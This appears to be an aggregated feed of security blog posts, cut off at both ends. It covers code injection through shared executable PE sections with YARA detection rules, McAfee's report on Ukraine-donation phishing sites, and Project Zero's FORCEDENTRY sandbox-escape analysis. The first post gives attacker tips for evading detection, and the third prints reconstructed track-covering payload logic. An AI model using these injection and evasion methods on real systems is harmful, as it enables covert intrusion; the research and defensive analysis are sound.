This increased telemetry alongside existing methods such as ObRegisterCallbacks has made it difficult to move laterally without exposing malicious operations to kernel-visible telemetry. In this article, we will explore how to abuse certain quirks of PE Sections to place arbitrary shellcode into the memory of a remote process without requiring direct process access.

Background

Existing methods of moving laterally often involve dangerous API calls such as OpenProcess to gain a process handle accompanied by memory-related operations such as VirtualAlloc, VirtualProtect, or WriteProcessMemory. In recent years, the detection surface for these operations has increased.

For example, on older versions of Windows, one of the only cross-process API calls that kernel drivers had documented visibility into was the creation of process and thread handles via ObRegisterCallbacks.

The visibility introduced by Microsoft’s threat intelligence ETW provider has expanded to cover operations such as:

  1. Read/Write virtual memory calls (EtwTiLogReadWriteVm).
  2. Allocation of executable memory (EtwTiLogAllocExecVm).
  3. Changing the protection of memory to executable (EtwTiLogProtectExecVm).
  4. Mapping an executable section (EtwTiLogMapExecView).

Other methods of entering the context of another process typically come with other detection vectors. For example, another method of moving laterally may involve disk-based attacks such as Proxy Dll Injection. The problem with these sorts of attacks is that they often require writing malicious code to disk, which is visible to kernel-based defensive solutions.

Since these visible operations are required by known methods of cross-process movement, one must start looking beyond existing methods for staying ahead of telemetry available to defenders.

Discovery

Recently I was investigating the extent to which you could corrupt a Portable Executable (PE) binary without impacting its usability. For example, could you corrupt a known malicious tool such as Mimikatz to an extent that wouldn't impact its operability but would break the image parsers built into anti-virus software?

Similar to ELF executables in Linux, Windows PE images are made up of "sections". For example, code is typically stored in a section called .text, mutable data can be found in .data, and read-only data is generally in .rdata. How does the operating system know which sections contain code or should be writable? Each section has "characteristics" which define how it is allocated.

There are over 35 documented characteristics for PE sections. The most common include IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, and IMAGE_SCN_MEM_WRITE which define if a section should be executable, readable, and/or writeable. These only represent a small fraction of the possibilities for PE sections however.

When attempting to corrupt the PE section header, one specific flag caught my eye:

"IMAGE_SCN_MEM_SHARED" characteristic

According to Microsoft's documentation, the IMAGE_SCN_MEM_SHARED flag means that "the section can be shared in memory". What exactly does this mean? There isn't much documentation on the use of this flag online, but it turned out that if this flag is enabled, that section's memory is shared across all processes that have the image loaded. For example, if processes A and B load a PE image with a section that is "shared" (and writable), any changes in the memory of that section in process A will be reflected in process B.

Some research relevant to the theory we will discuss in this article is DLL shared sections: a ghost of the past by Gynvael Coldwind. In his paper, Coldwind explored the potential vulnerabilities posed by binaries with PE sections that had the IMAGE_SCN_MEM_SHARED characteristic.

Coldwind explained that the risk posed by these PE images "is an old and well-known security problem" with a reference to an article from Microsoft published in 2004 titled Why shared sections are a security hole. The paper only focused on the threat posed by "Read/write shared sections" and "Read/only shared sections" without addressing a third option, "Read/write/execute shared sections".

Exploiting Shared Sections

Although the general risk of shared sections has been known by researchers and Microsoft themselves for quite some time, there has not been significant investigation into the potential abuse of shared sections that are readable, writable, and executable (RWX-S).

There is great offensive potential for RWX-S binaries because if you can cause a remote process to load an RWX-S binary of your choice, you now have an executable memory page in the remote process that can be modified without being visible to kernel-based defensive solutions. To inject code, an attacker could load an RWX-S binary into their process, edit the section with whatever malicious code they want in memory, load the RWX-S binary into the remote process, and the changes in their own process would be reflected in the victim process as well.

The action of loading the RWX-S binary itself would still be visible to defensive solutions, but as we will discuss in a later section, there are plenty of options for legitimate RWX-S binaries that are used outside of a malicious context.

There are a few noteworthy comments about using this technique:

  1. An attacker must be able to load an RWX-S binary into the remote process. This binary does not need to contain any malicious code other than a PE section that is RWX-S.
  2. If the RWX-S binary is x86, LoadLibrary calls inside of an x64 process will fail. x86 binaries can still be manually mapped inside x64 processes by opening the file, creating a section with the attribute SEC_IMAGE, and mapping a view of the section.
  3. RWX-S binaries are not shared across sessions. RWX-S binaries are shared by unprivileged and privileged processes in the same session.
  4. Modifications to shared sections are not written to disk. For example, the buffer returned by both ReadFile and mapping the image with the attribute SEC_COMMIT do not contain any modifications on the shared section. Only when the binary is mapped as SEC_IMAGE will these changes be present. This also means that any modifications to the shared section will not break the authenticode signature on disk.
  5. Unless the used RWX-S binary has its entrypoint inside of the shared executable section, an attacker must be able to cause execution at an arbitrary address in the remote process. This does not require direct process access. For example, SetWindowsHookEx could be used to execute an arbitrary pointer in a module without direct process access.

In the next sections, we will cover practical implementations for this theory and the prevalence of RWX-S host binaries in the wild.

Patching Entrypoint to Gain Execution

In certain cases, the requirement for an attacker to be able to execute an arbitrary pointer in the remote process can be bypassed.

If the RWX-S host binary has its entrypoint located inside of an RWX-S section, then an attacker does not need a special execution method.

Instead, before loading the RWX-S host binary into the remote process, an attacker can patch the memory located at the image's entrypoint to represent any arbitrary shellcode to be executed. When the victim process loads the RWX-S host binary and attempts to execute the entrypoint, the attacker's shellcode will be executed instead.

Finding RWX-S Binaries In-the-Wild

One of the questions that this research attempts to address is "How widespread is the RWX-S threat?". For determining the prevalence of the technique, I used VirusTotal's Retrohunt functionality which allows users to "scan all the files sent to VirusTotal in the past 12 months with ... YARA rules".

For detecting unsigned RWX-S binaries in-the-wild, a custom YARA rule was created that checks for an RWX-S section in the PE image:

import "pe"

rule RWX_S_Search
{
	meta:
		description = "Detects RWX-S binaries."
		author = "Bill Demirkapi"
	condition:
		for any i in (0..pe.number_of_sections - 1): (
			(pe.sections[i].characteristics & pe.SECTION_MEM_READ) and
			(pe.sections[i].characteristics & pe.SECTION_MEM_EXECUTE) and
			(pe.sections[i].characteristics & pe.SECTION_MEM_WRITE) and
			(pe.sections[i].characteristics & pe.SECTION_MEM_SHARED) )
}

All this rule does is enumerate a binary's PE sections and check whether any of them is readable, writable, executable, and shared.
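For defenders who want to run the same check outside of YARA, the logic can be sketched in Python using only the standard library. This is an illustrative sketch rather than the script used for this research: the function name is hypothetical, and it assumes a well-formed image. The flag values and header offsets come from the documented PE/COFF format.

```python
import struct

IMAGE_SCN_MEM_SHARED = 0x10000000
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
RWX_S = (IMAGE_SCN_MEM_SHARED | IMAGE_SCN_MEM_EXECUTE
         | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE)
IMAGE_FILE_MACHINE_AMD64 = 0x8664


def rwx_s_sections(image):
    """Return (machine, [names of RWX-S sections]) for the PE bytes in `image`."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ header")
    (pe_offset,) = struct.unpack_from("<I", image, 0x3C)  # e_lfanew
    if image[pe_offset:pe_offset + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # COFF file header: 20 bytes directly after the 4-byte signature.
    machine, section_count, _, _, _, optional_size, _ = struct.unpack_from(
        "<HHIIIHH", image, pe_offset + 4)
    table = pe_offset + 4 + 20 + optional_size
    names = []
    for index in range(section_count):
        header = table + index * 40  # each section header is 40 bytes
        name = image[header:header + 8].rstrip(b"\0").decode("ascii", "replace")
        (characteristics,) = struct.unpack_from("<I", image, header + 36)
        if characteristics & RWX_S == RWX_S:
            names.append(name)
    return machine, names
```

Calling rwx_s_sections on the bytes of a file and comparing the returned machine value against IMAGE_FILE_MACHINE_AMD64 mirrors the x64-only variant of the rule described in this section.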

When this rule was searched via Retrohunt, over 10,000 unsigned binaries were found (Retrohunt stops searching beyond 10,000 results).

When this rule was searched again with a slight modification to check that the PE image is for the MACHINE_AMD64 machine type, there were only 99 x64 RWX-S binaries.

This suggests that RWX-S binaries for x64 machines have been relatively uncommon for the past 12 months and indicates that defensive solutions may be able to filter for RWX-S binaries without significant noise on protected machines.

In order to detect signed RWX-S binaries, the YARA rule above was slightly modified to contain a check for authenticode signatures.

import "pe"

rule RWX_S_Signed_Search
{
	meta:
		description = "Detects RWX-S signed binaries. This only verifies that the image contains a signature, not that it is valid."
		author = "Bill Demirkapi"
	condition:
		for any i in (0..pe.number_of_sections - 1): (
			(pe.sections[i].characteristics & pe.SECTION_MEM_READ) and
			(pe.sections[i].characteristics & pe.SECTION_MEM_EXECUTE) and
			(pe.sections[i].characteristics & pe.SECTION_MEM_WRITE) and
			(pe.sections[i].characteristics & pe.SECTION_MEM_SHARED) )
		and pe.number_of_signatures > 0
}

Unfortunately with YARA rules, there is not an easy way to determine if a PE image contains an authenticode signature that has a valid certificate that has not expired or was signed with a valid timestamp during the certificate's life. This means that the YARA rule above will contain some false positives of binaries with invalid signatures. Since there were false positives, the rule above did not immediately provide a list of RWX-S binaries that have a valid authenticode signature. To extract signed binaries, a simple Python script was written that downloaded each sample below a detection threshold and verified the signature of each binary.

After this processing, approximately 15 unique binaries with valid authenticode signatures were found. As seen with unsigned binaries, signed RWX-S binaries are not significantly common in-the-wild for the past 12 months. Additionally, only 5 of the 15 unique signed binaries are for x64 machines. It is important to note that while this number may seem low, signed binaries are only a convenience and are certainly not required in most situations.

Abusing Unsigned RWX-S Binaries

Patching Unsigned Binaries

Given that mitigations such as User-Mode Code Integrity have not experienced widespread adoption, patching existing unsigned binaries still remains a viable method.

To abuse RWX-S sections with unsigned binaries, an attacker could:

  1. Find a legitimate host unsigned DLL to patch.
  2. Read the unsigned DLL into memory and patch a section's characteristics to be readable, writable, executable, and shared.
  3. Write this new patched RWX-S host binary somewhere on disk before using it.

Here are a few suggestions for maintaining operational security:

  1. It is recommended that an attacker does not patch an existing binary on disk. For example, if an attacker only modified the section characteristics of an existing binary and wrote this patch to the same path on disk, defensive solutions could detect that an RWX-S patch was applied to that existing file. Therefore, it is recommended that patched binaries be written to a different location on disk.
  2. It is recommended that an attacker add other patches besides just RWX-S. This can be modifying other meaningless properties around the section's characteristics or modifying random parts of the code (it is important that these changes do not appear malicious). This is to make it harder to differentiate when an attacker has specifically applied an RWX-S patch on a binary.

Using Existing Unsigned Binaries

Creating a custom patched binary is not required. For example, using the YARA rule in the previous section, an attacker could use any of the existing unsigned RWX-S binaries that may be used in legitimate applications.

Abusing Signed RWX-S Binaries in the Kernel

Although there were only 15 signed RWX-S binaries discovered in the past 12 months, the fact that they have a valid authenticode signature can be useful during exploitation of processes that may require signed modules.

One interesting signed RWX-S binary that the search revealed was a signed driver. When attempting to test if shared sections are replicated from user-mode to kernel-mode, it was revealed that the memory is not shared, even when the image is mapped and modified by a process in Session 0.

Conclusion

Although the rarity of shared sections presents a unique opportunity for defenders to obtain high-fidelity telemetry, RWX-S binaries still serve as a powerful method that breaks common assumptions regarding cross-process memory allocation and execution. The primary challenge for defenders around this technique is its prevalence in unsigned code. It may be relatively simple to detect RWX-S binaries, but how do you tell if one is used in a legitimate application?

Scammers are Exploiting Ukraine Donations

1 April 2022 at 21:35

Authored by Vallabh Chole and Oliver Devane

Scammers are very quick at reacting to current events, so they can generate ill-gotten gains. It comes as no surprise that they exploited the current events in Ukraine, and when the Ukrainian Twitter account tweeted Bitcoin and Ethereum wallet addresses for donations we knew that scammers would use this as a lure for their victims.

This blog covers some of the malicious sites and emails McAfee has observed in the past few weeks.

Crypto wallet donation scams

A crypto donation scam occurs when perpetrators create phishing websites and emails that contain cryptocurrency wallets asking for donations. We have observed several new domains being created which perform this malicious activity, such as ukrainehelp[.]world and ukrainethereum[.]com.

Ukrainehelp[.]world

Below is a screenshot of Ukrainehelp[.]world, which is a phishing site asking for crypto donations for UNICEF. The website contains the BBC logo and several crypto wallet addresses.

While investigating this site, we observed that the Ethereum wallet used was also associated with an older crypto scam site called eth-event20.com. The image below shows the current value of the crypto wallet, which is worth $114,000. Interestingly, this wallet transfers all its coins to 0xc95eb2aa75260781627e7171c679a490e2240070, which in turn transfers to 0x45fb09468b17d14d2b9952bc9dcb39ee7359e64d. The final wallet currently has 313 ETH, which is worth over $850,000. This shows the large sums of money scammers can generate with phishing sites.

Ukrainethereum[.]com

Ukrainethereum[.]com is another crypto scam site. What makes this one interesting is the features it uses to gain the victim’s trust, such as a fake chatbox and a fake donation verifier.

Fake Chat

The image above shows the chatbox on the left-hand side which displays several messages. At first glance, it would appear as if other users are on the website and talking, but when you reload the site it shows the same messages. This is due to the chat messages being displayed from a list that is used to populate the website with JavaScript code as shown on the right-hand side.  

Fake Donation Verifier 

The site contains a donation checker so the victim can see if their donation was received, as shown below. 

 

  1. The first image on the left shows the verification box used to check whether a donation has completed.
  2. Upon clicking ‘Check’, the victim is shown a message saying the donation was received.
  3. What actually occurs is that, upon clicking ‘Check’, the JavaScript code changes the page so that it displays the ‘Thanks!’ message; no actual check is performed.

Phishing Email 

The following image shows one example of the phishing emails we have observed.

The email is not addressed to anyone specifically, as it is mass-mailed to multiple email addresses. The wallet IDs in the email are not associated with the official Ukraine Twitter account and are owned by scammers. As you can see in the image above, they look similar to the official ones because the first 3 characters are the same, which could lead some users to believe the email is legitimate. Therefore, it’s important to check that the whole wallet address is identical.
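The difference between glancing at the first few characters and comparing the full address can be sketched in a few lines of Python. This is only an illustration: both addresses below are invented placeholders (not the wallets from the email), the helper names are hypothetical, and the case-insensitive comparison assumes Ethereum-style hex addresses.

```python
def same_wallet(candidate: str, official: str) -> bool:
    """Return True only when the two hex addresses match in full."""
    return candidate.strip().lower() == official.strip().lower()


def shares_prefix(candidate: str, official: str, length: int = 5) -> bool:
    """Mimic a hurried visual check: '0x' plus the first three hex digits."""
    return candidate[:length].lower() == official[:length].lower()


# Invented placeholder addresses, for illustration only.
OFFICIAL = "0xabc1111111111111111111111111111111111111"
LOOKALIKE = "0xabc2222222222222222222222222222222222222"

prefix_matches = shares_prefix(LOOKALIKE, OFFICIAL)  # the weak check passes
fully_matches = same_wallet(LOOKALIKE, OFFICIAL)     # the full check does not
```

Only the full comparison separates the two addresses; the prefix check is exactly what the scam relies on.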

Credit Card Information Stealer 

This is the most common type of phishing website. The goal of these sites is to entice the victim into entering their credit card details and personally identifiable information (PII) by making them believe that the site being visited is official. This section contains details on one such website we have found using Ukraine donations as a lure.

Razonforukraine[.]com

The image below shows the phishing site. The website used Save the Children NGO links and images, which made it appear more genuine. You can see that it is asking the victim to enter their credit card and billing information.

Once the data is entered, and the victim clicks on ‘Donate’, the information will be submitted via the form and will be sent to scammers so they can then use or sell the information. 

We observed that a few days after the website was created, the scammers changed the site code so that it became a McDonald’s phishing site targeting the Arab Emirates. This was a surprising change in tactics.

The heatmap below shows the detections McAfee has observed around the world for the malicious sites mentioned in this blog. 

Conclusion 

How to identify a phishing email? 

  • Check the domain the email was sent from; attackers often masquerade as a legitimate sender.
  • Use McAfee Web Advisor as this prevents you from accessing malicious sites 
  • If McAfee Web Advisor is not used, links can be manually checked at https://trustedsource.org/. 
  • Perform a Web Search of any crypto wallet addresses. If the search returns no or a low number of hits it is likely fraudulent. 
  • Check for poor grammar and suspicious logos  
  • For more detailed advice please visit McAfee’s How to recognize and protect yourself from phishing page 

How to identify phishing websites? 

  • Use McAfee Web Advisor as this prevents you from accessing malicious sites 
  • Look at the URL of the website which you are visiting and make sure it is correct. Look for alterations such as logln-paypal.com instead of login.paypal.com 
  • If you are unsure whether the website is legitimate, perform a web search of the URL. You will find many results if it is genuine. If the search returns no or a low number of hits, it is likely fraudulent.
  • Hyperlinks and site addresses that do not match the sender – Hover your mouse over the hyperlink or call-to-action button in the email. Is the address shortened or is it different from what you would expect from the sender? It may be a spoofed address from the 
  • Verify if the URL and Title of the page match. Such as the website, razonforukraine[.]com with a title reading “McDonald’s Delivery” 
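As a rough illustration of the URL check above, the following Python sketch flags hostnames that are close to, but not identical to, a trusted one. The allow-list, the threshold and the function name are assumptions made for this example; string similarity is only one possible heuristic and is not how McAfee Web Advisor is stated to work.

```python
from difflib import SequenceMatcher

# Hypothetical allow-list; a real deployment would maintain its own.
TRUSTED_HOSTS = ["login.paypal.com"]


def lookalike_of(host: str, threshold: float = 0.8):
    """Return the trusted host that `host` appears to imitate, or None.

    An exact match is treated as legitimate, so only near-misses are reported.
    """
    host = host.lower()
    if host in TRUSTED_HOSTS:
        return None
    for trusted in TRUSTED_HOSTS:
        if SequenceMatcher(None, host, trusted).ratio() >= threshold:
            return trusted
    return None


suspicious = lookalike_of("logln-paypal.com")
genuine = lookalike_of("login.paypal.com")
unrelated = lookalike_of("example.org")
```

A similarity threshold will produce both false positives and misses, so a hit is a prompt for a closer look, not a verdict.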

For general cyber scam education, click here

McAfee customers are protected against the malicious sites detailed in this blog as they are blocked with McAfee Web Advisor 

 

Type  Value  Product  Detected 
URL – Phishing Sites   ukrainehelp[.]world  McAfee WebAdvisor   Blocked 
URL – Phishing Sites   ukrainethereum[.]com  McAfee WebAdvisor   Blocked 
URL – Phishing Sites   unitedhelpukraine[.]kiev[.]ua/  McAfee WebAdvisor   Blocked 
URL – Phishing Sites   donationukraine[.]io/donate  McAfee WebAdvisor   Blocked 
URL – Phishing Sites   help-ukraine-compaign[.]com/shop  McAfee WebAdvisor   Blocked 
URL – Phishing Sites   ukrainebitcoin[.]online/  McAfee WebAdvisor   Blocked 
URL – Phishing Sites   ukrainedonation[.]org/donate  McAfee WebAdvisor   Blocked 
URL – Phishing Sites   ukrainewar[.]support  McAfee WebAdvisor   Blocked 
URL – Phishing Sites   sendhelptoukraine[.]com  McAfee WebAdvisor   Blocked 
URL – Phishing Sites   worldsupportukraine[.]com  McAfee WebAdvisor   Blocked 
URL – Phishing Sites   paytoukraine[.]space  McAfee WebAdvisor   Blocked 
URL – Phishing Sites   razonforukraine[.]com  McAfee WebAdvisor   Blocked 

 

The post Scammers are Exploiting Ukraine Donations appeared first on McAfee Blog.

FORCEDENTRY: Sandbox Escape

By: Anonymous
31 March 2022 at 16:00

Posted by Ian Beer & Samuel Groß of Google Project Zero

We want to thank Citizen Lab for sharing a sample of the FORCEDENTRY exploit with us, and Apple’s Security Engineering and Architecture (SEAR) group for collaborating with us on the technical analysis. Any editorial opinions reflected below are solely Project Zero’s and do not necessarily reflect those of the organizations we collaborated with during this research.

Late last year we published a writeup of the initial remote code execution stage of FORCEDENTRY, the zero-click iMessage exploit attributed by Citizen Lab to NSO. By sending a .gif iMessage attachment (which was really a PDF) NSO were able to remotely trigger a heap buffer overflow in the ImageIO JBIG2 decoder. They used that vulnerability to bootstrap a powerful weird machine capable of loading the next stage in the infection process: the sandbox escape.

In this post we'll take a look at that sandbox escape. It's notable for using only logic bugs. In fact it's unclear where the features that it uses end and the vulnerabilities which it abuses begin. Both current and upcoming state-of-the-art mitigations such as Pointer Authentication and Memory Tagging have no impact at all on this sandbox escape.

An observation

During our initial analysis of the .gif file Samuel noticed that rendering the image appeared to leak memory. Running the heap tool after releasing all the associated resources gave the following output:

$ heap $pid

------------------------------------------------------------

All zones: 4631 nodes (826336 bytes)        

             

   COUNT    BYTES     AVG   CLASS_NAME   TYPE   BINARY          

   =====    =====     ===   ==========   ====   ======        

    1969   469120   238.3   non-object

     825    26400    32.0   JBIG2Bitmap  C++   CoreGraphics

heap was able to determine that the leaked memory contained JBIG2Bitmap objects.

Using the -address option we could find all the individual leaked bitmap objects:

$ heap -address JBIG2Bitmap $pid

and dump them out to files. One of those objects was quite unlike the others:

$ hexdump -C dumpXX.bin | head

00000000  62 70 6c 69 73 74 30 30  |bplist00|

...

00000018        24 76 65 72 73 69  |  $versi|

00000020  6f 6e 59 24 61 72 63 68  |onY$arch|

00000028  69 76 65 72 58 24 6f 62  |iverX$ob|

00000030  6a 65 63 74 73 54 24 74  |jectsT$t|

00000038  6f 70                    |op      |

00000040        4e 53 4b 65 79 65  |  NSKeye|

00000048  64 41 72 63 68 69 76 65  |dArchive|

It's clearly a serialized NSKeyedArchiver. Definitely not what you'd expect to see in a JBIG2Bitmap object. Running strings we see plenty of interesting things (noting that the URL below is redacted):

Objective-C class and selector names:

NSFunctionExpression

NSConstantValueExpression

NSConstantValue

expressionValueWithObject:context:

filteredArrayUsingPredicate:

_web_removeFileOnlyAtPath:

context:evaluateMobileSubscriberIdentity:

performSelectorOnMainThread:withObject:waitUntilDone:

...

The name of the file which delivered the exploit:

XXX.gif

Filesystem paths:

/tmp/com.apple.messages

/System/Library/PrivateFrameworks/SlideshowKit.framework/Frameworks/OpusFoundation.framework

a URL:

https://XXX.cloudfront.net/YYY/ZZZ/megalodon?AAA

Using plutil we can convert the bplist00 binary format to XML. Performing some post-processing and cleanup we can see that the top-level object in the NSKeyedArchiver is a serialized NSFunctionExpression object.
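For readers without plutil to hand, Python's standard plistlib module can perform a comparable conversion. The sketch below builds a toy archive, since the real sample is not available: the four top-level keys are the ones visible in the hexdump, while every value is invented and the `$top` entry is simplified to a plain integer.

```python
import plistlib

# Toy stand-in for an NSKeyedArchiver payload; all values are invented.
archive = {
    "$version": 100000,
    "$archiver": "NSKeyedArchiver",
    "$objects": ["$null", "placeholder object"],
    "$top": {"root": 1},
}

blob = plistlib.dumps(archive, fmt=plistlib.FMT_BINARY)


def looks_like_binary_plist(data: bytes) -> bool:
    """Check for the 'bplist00' magic seen at the start of the leaked object."""
    return data.startswith(b"bplist00")


def to_xml(data: bytes) -> bytes:
    """Re-serialize a plist as XML, similar in spirit to a plutil conversion."""
    return plistlib.dumps(plistlib.loads(data), fmt=plistlib.FMT_XML)


xml_form = to_xml(blob)
```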

NSExpression NSPredicate NSExpression

If you've ever used Core Data or tried to filter an Objective-C collection you might have come across NSPredicates. According to Apple's public documentation they are used "to define logical conditions for constraining a search for a fetch or for in-memory filtering".

For example, in Objective-C you could filter an NSArray object like this:

  NSArray* names = @[@"one", @"two", @"three"];

  NSPredicate* pred;

  pred = [NSPredicate predicateWithFormat:

            @"SELF beginswith[c] 't'"];

  NSLog(@"%@", [names filteredArrayUsingPredicate:pred]);

The predicate is "SELF beginswith[c] 't'". This prints an NSArray containing only "two" and "three".
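For readers more familiar with other languages, the same filter can be approximated in Python. This is only an analogy: `begins_with` is a hypothetical helper, and the `[c]` modifier is modelled as a simple lower-casing of both sides.

```python
names = ["one", "two", "three"]


def begins_with(prefix: str, case_insensitive: bool = True):
    """Build a predicate function loosely mirroring SELF beginswith[c] 't'."""
    def predicate(value: str) -> bool:
        if case_insensitive:
            return value.lower().startswith(prefix.lower())
        return value.startswith(prefix)
    return predicate


pred = begins_with("t")
filtered = [name for name in names if pred(name)]
```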

[NSPredicate predicateWithFormat] builds a predicate object by parsing a small query language, a little like an SQL query.

NSPredicates can be built up from NSExpressions, connected by NSComparisonPredicates (like less-than, greater-than and so on.)

NSExpressions themselves can be fairly complex, containing aggregate expressions (like "IN" and "CONTAINS"), subqueries, set expressions, and, most interestingly, function expressions.

Prior to 2007 (in OS X 10.4 and below) function expressions were limited to just the following five extra built-in methods: sum, count, min, max, and average.

But starting in OS X 10.5 (which would also be around the launch of iOS in 2007) NSFunctionExpressions were extended to allow arbitrary method invocations with the FUNCTION keyword:

  "FUNCTION('abc', 'stringByAppendingString', 'def')" => @"abcdef"

FUNCTION takes a target object, a selector and an optional list of arguments then invokes the selector on the object, passing the arguments. In this case it will allocate an NSString object @"abc" then invoke the stringByAppendingString: selector passing the NSString @"def", which will evaluate to the NSString @"abcdef".

In addition to the FUNCTION keyword there's CAST which allows full reflection-based access to all Objective-C types (as opposed to just being able to invoke selectors on literal strings and integers):

  "FUNCTION(CAST('NSFileManager', 'Class'), 'defaultManager')"

Here we can get access to the NSFileManager class and call the defaultManager selector to get a reference to a process's shared file manager instance.
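The combination of FUNCTION and CAST is easier to appreciate with an analogy in a language that has similar run-time reflection. The Python sketch below is not how NSExpression is implemented; `function` and `cast_to_class` are hypothetical helpers that simply show how a method name and a class name, both supplied as strings, are enough to reach and call arbitrary code.

```python
import importlib


def function(target, selector: str, *args):
    """Analogue of FUNCTION(target, 'selector', args...): look the method up
    by name at run time and invoke it on the target."""
    return getattr(target, selector)(*args)


def cast_to_class(qualified_name: str):
    """Analogue of CAST('ClassName', 'Class'): turn a string into a class."""
    module_name, _, class_name = qualified_name.rpartition(".")
    return getattr(importlib.import_module(module_name), class_name)


# Dynamic dispatch on a literal, like the stringByAppendingString: example.
joined = function("abc", "__add__", "def")

# Reach a class from nothing but a string, then call a class-level method,
# like FUNCTION(CAST('NSFileManager', 'Class'), 'defaultManager').
ordered = function(cast_to_class("collections.OrderedDict"), "fromkeys", "ab")
```

Once both steps are driven by data, the data is effectively a program.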

These keywords exist in the string representation of NSPredicates and NSExpressions. Parsing those strings involves creating a graph of NSExpression objects, NSPredicate objects and their subclasses like NSFunctionExpression. It's a serialized version of such a graph which is present in the JBIG2 bitmap.

NSPredicates using the FUNCTION keyword are effectively Objective-C scripts. With some tricks it's possible to build nested function calls which can do almost anything you could do in procedural Objective-C. Figuring out some of those tricks was the key to the 2019 Real World CTF DezhouInstrumentz challenge, which would evaluate an attacker-supplied NSExpression format string. The writeup by the challenge author is a great introduction to these ideas and I'd strongly recommend reading that now if you haven't. The rest of this post builds on the tricks described in that post.

A tale of two parts

The only job of the JBIG2 logic gate machine described in the previous blog post is to cause the deserialization and evaluation of an embedded NSFunctionExpression. No attempt is made to get native code execution, ROP, JOP or any similar technique.

Prior to iOS 14.5 the isa field of an Objective-C object was not protected by Pointer Authentication Codes (PAC), so the JBIG2 machine builds a fake Objective-C object with a fake isa such that the invocation of the dealloc selector causes the deserialization and evaluation of the NSFunctionExpression. This is very similar to the technique used by Samuel in the 2020 SLOP post.

This NSFunctionExpression has two purposes:

Firstly, it allocates and leaks an AMSKeepAlive object then tries to cover its tracks by finding and deleting the .gif file which delivered the exploit.

Secondly, it builds a payload NSPredicate object then triggers a logic bug to get that NSPredicate object evaluated in the CommCenter process, reachable from the IMTranscoderAgent sandbox via the com.apple.commcenter.xpc NSXPC service.

Let's look at those two parts separately:

Covering tracks

The outer level NSFunctionExpression calls performSelectorOnMainThread:withObject:waitUntilDone: which in turn calls makeObjectsPerformSelector:@"expressionValueWithObject:context:" on an NSArray of four NSFunctionExpressions. This allows the four independent NSFunctionExpressions to be evaluated sequentially.

With some manual cleanup we can recover pseudo-Objective-C versions of the serialized NSFunctionExpressions.

The first one does this:

[[AMSKeepAlive alloc] initWithName:"KA"]

This allocates and then leaks an AppleMediaServices KeepAlive object. The exact purpose of this is unclear.

The second entry does this:

[[NSFileManager defaultManager] _web_removeFileOnlyAtPath:

  [@"/tmp/com.apple.messages" stringByAppendingPathComponent:

    [ [ [ [

            [NSFileManager defaultManager]

            enumeratorAtPath: @"/tmp/com.apple.messages"

          ]

          allObjects

        ]

        filteredArrayUsingPredicate:

          [

            [NSPredicate predicateWithFormat:

              [

                [@"SELF ENDSWITH '"

                  stringByAppendingString: "XXX.gif"]

                stringByAppendingString: "'"

      ]   ] ] ]

      firstObject

    ]

  ]

]

Reading these single expression NSFunctionExpressions is a little tricky; breaking that down into a more procedural form it's equivalent to this:

NSFileManager* fm = [NSFileManager defaultManager];

NSDirectoryEnumerator* dir_enum;

dir_enum = [fm enumeratorAtPath: @"/tmp/com.apple.messages"];

NSArray* allTmpFiles = [dir_enum allObjects];

NSString* filter;

filter = [@"SELF ENDSWITH '" stringByAppendingString: @"XXX.gif"];

filter = [filter stringByAppendingString: @"'"];

NSPredicate* pred;

pred = [NSPredicate predicateWithFormat: filter];

NSArray* matches;

matches = [allTmpFiles filteredArrayUsingPredicate: pred];

NSString* gif_subpath = [matches firstObject];

NSString* root = @"/tmp/com.apple.messages";

NSString* full_path;

full_path = [root stringByAppendingPathComponent: gif_subpath];

[fm _web_removeFileOnlyAtPath: full_path];

This finds the XXX.gif file used to deliver the exploit which iMessage has stored somewhere under the /tmp/com.apple.messages folder and deletes it.
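The same enumerate, filter, take-first and delete sequence can be sketched in Python against a throwaway directory. The directory layout and file names below are invented for the demo, and unlike enumeratorAtPath: this sketch lists files only, not directories.

```python
import os
import tempfile


def remove_first_match(root: str, suffix: str):
    """Delete the first file under `root` whose relative path ends with
    `suffix`. Returns the removed path, or None when nothing matched."""
    # Collect subpaths relative to root, as the enumerator does.
    subpaths = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            subpaths.append(os.path.relpath(full, root))

    # Equivalent of the "SELF ENDSWITH '<suffix>'" filter plus firstObject.
    matches = [path for path in subpaths if path.endswith(suffix)]
    if not matches:
        return None

    full_path = os.path.join(root, matches[0])
    os.remove(full_path)
    return full_path


# Demo in a temporary directory (hypothetical layout).
with tempfile.TemporaryDirectory() as root:
    nested = os.path.join(root, "ab", "cd")
    os.makedirs(nested)
    target = os.path.join(nested, "XXX.gif")
    other = os.path.join(nested, "keep.txt")
    for path in (target, other):
        with open(path, "wb") as handle:
            handle.write(b"placeholder")

    removed = remove_first_match(root, "XXX.gif")
    target_gone = not os.path.exists(target)
    other_kept = os.path.exists(other)
```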

The other two NSFunctionExpressions build a payload and then trigger its evaluation in CommCenter. For that we need to look at NSXPC.

NSXPC

NSXPC is a semi-transparent remote-procedure-call mechanism for Objective-C. It allows the instantiation of proxy objects in one process which transparently forward method calls to the "real" object in another process:

https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html

I say NSXPC is only semi-transparent because it does enforce some restrictions on what objects are allowed to traverse process boundaries. Any object "exported" via NSXPC must also define a protocol which designates which methods can be invoked and the allowable types for each argument. The NSXPC programming guide further explains the extra handling required for methods which require collections and other edge cases.

The low-level serialization used by NSXPC is the same explored by Natalie Silvanovich in her 2019 blog post looking at the fully-remote attack surface of the iPhone. An important observation in that post was that subclasses of classes with any level of inheritance are also allowed, as is always the case with NSKeyedUnarchiver deserialization.

This means that any protocol object which declares a particular type for a field will also, by design, accept any subclass of that type.

The logical extreme of this would be that a protocol which declared an argument type of NSObject would allow any subclass, which is the vast majority of all Objective-C classes.
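The consequence of subclass-tolerant type checks can be shown with a small Python model. The class names are stand-ins invented for this sketch and `check_argument` is a hypothetical helper; it models only the "declared type or any subclass" rule, not NSXPC itself.

```python
class Identity:
    """Stand-in for the type a developer expected to receive."""


class SpecialIdentity(Identity):
    """A subclass the developer may never have considered."""


class Predicate:
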